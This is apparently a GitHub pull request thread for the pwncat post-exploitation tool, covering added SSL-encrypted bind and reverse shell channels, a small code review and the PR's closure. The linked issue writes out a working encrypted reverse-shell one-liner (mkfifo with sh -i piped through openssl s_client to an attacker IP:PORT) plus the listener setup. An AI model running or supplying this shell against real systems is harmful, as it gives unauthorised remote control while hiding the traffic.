### PR TITLE
[FEATURE #118] Encrypted Bind and Reverse Shells 

### LINKED ISSUE #118: Encrypted shells with `pwncat`
> NOTE: I am not sure if this will fit with your current methods and features

**Is your feature request related to a problem? Please describe.**
No, my feature request is not related to any problem.

**Describe the solution you'd like**
Given the _benefits and features_ of this _amazing_ tool, thanks to `calebstewart` and __team__.
It will be amazing to have an option (like `--encrypt`) that allows an _attacker_ to `encrypt` his/her __connection__ with the `victim machine`

We can utilize `openssl` to achieve this.

```bash
# select any reasonable amount of time as `-days VALIDITY`, like a day or two
# we can completely ignore this validity check on the client/victim side with `-no_check_time`

# create a self-signed certificate, to be used while creating a connection (using type RSA with 4096 bits)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 1 -nodes

# Start a server to listen for the incoming connections
openssl s_server -quiet -key key.pem -cert cert.pem -port PORT
```

```bash
# On the victim machine, invoke the following commands
if [ -p /tmp/f ]; then
    rm /tmp/f
fi

mkfifo /tmp/f
cat /tmp/f | sh -i 2>&1 | openssl s_client -quiet -connect IP:PORT > /tmp/f
rm /tmp/f
```

I did some analysis of the whole `pwncat` and `victim` interaction, all those `echo ...; get_information; echo ...;` stuff.
Given an option like `--encrypt` is supplied, we can check for the `openssl` binary and any other requirements for the same.
This can be done before or after `pwncat` does its _wizardry_ behind the scenes stuff, that is the required __system checks__ and all of the __good automation stuff__.
But this needs to be done before `pwncat` _stabilises the shell_.

**Describe alternatives you've considered**
There can be multiple ways to achieve the same functionality, I have only provided one such method that I have tested myself.
There is `ncat --ssl` as well, it requires you to have the `key` file saved on the `victim machine`.

**Additional context**
Here are some pictures showing the process discussed above.

### Creating required keys and starting the listener
image-1

### Invoking the connection from the victim machine
image-2

### Stabilizing the shell
image-3

### Unencrypted connection (Here, I have used my keys to decrypt the TLS traffic, but it is similar for a normal unencrypted connection)
image-4

### Encrypted connection
image-5

### PR DESCRIPTION
**Pull request by calebstewart**
## Description of Changes
Fixes #118.

This pull requests adds two new channel classes/protocols: `ssl-bind` and `ssl-connect`. As with their unencrypted counterparts, these channels connect to or listen for a direct connection from/to the victim over a socket. After receiving or establishing a connection, the channel wraps the socket in an SSL context, and proceeds identically to the basic `bind` and `connect` channels.

The `ssl-bind` protocol requires two extra arguments: `certfile` and `keyfile`. At some point, I may implement automatic self-signed cert/key generation, but currently they must be generated separately and specified. To facilitate these new protocol options, a new argument was added to the entrypoint and the `connect` command. This argument is named `certificate` (or `cert` for short) and must point to an existing PEM formatted bundled certificate and key file. If your key and certificate are separate, you can also use the new query string syntax:

```sh
pwncat ssl-bind://0.0.0.0:4444?certfile=/path/to/cert.pem&keyfile=/path/to/key.pem
```

This implementation uses the standard `ssl` library from Python.

There was some discussion in #118 regarding implementing modules to automatically reconnect via encrypted session or upgrade an existing session to encrypted, however I believe that is outside the scope of the original issue. If @Mitul16 wants to dive into some PoCs for that functionality, I'm happy to hop into another issue to work on that, but I'd like to keep issues and pull requests focused on specific feature implementation or bug fixes.

**Please note any `noqa:` comments needed to appease flake8.**

## Major Changes Implemented:
- Added `ssl-bind` and `ssl-connect` channel protocols for encrypted shells
- Added `--certificate/--cert` argument to entrypoint and `connect` command
- Added query-string arguments to connection strings for both the entrypoint
  and the `connect` command.

## Pre-Merge Tasks
- [x] Formatted all modified files w/ `python-black`
- [x] Sorted imports for modified files w/ `isort`
- [x] Ran `flake8` on repo, and fixed any new problems w/ modified files
- [x] Ran `pytest` test cases
- [x] Added brief summary of updates to CHANGELOG (under `[Unreleased]`)

**For issues with pre-merge tasks, see CONTRIBUTING.md**

### CODE REVIEW

File: pwncat/__main__.py [hunk 1]
```diff
@@ -204,11 +232,14 @@ def main():
...
-                    if target.guid != host and target.public_address[0] != host:
+                    if (
+                        target.guid != query_args["host"]
+                        and target.public_address[0] != query_args["host"]
+                    ):
                         continue
 
                     # Collect users
-                    users = {}
+                    userss = {}
```
Comment (Mitul16) [inline pwncat/__main__.py:242]: @calebstewart Is this a _typo_? If there are no installed `implant`s, this _bug_ will not arise.

Comment (calebstewart) [reply pwncat/__main__.py]: Yes, it is. There was the same typo in the connect command as well. I've fixed them both.

**Comment by calebstewart** [comment]
In an effort to keep bug-fixes separate from feature additions, I've moved this pull request to target the new `release-v0.5.0` branch. This is an effort to keep bug-fixes separate from new features, and allow incremental bug-fix releases of `v0.4.x` in the meantime. Just wanted to make of note of it.

**Comment by calebstewart** [comment]
In an attempt to update my branch, I have apparently messed up this pull request. :rofl: I'm going to close it and reopen to try to clean this up.

**Pull request closed without merging**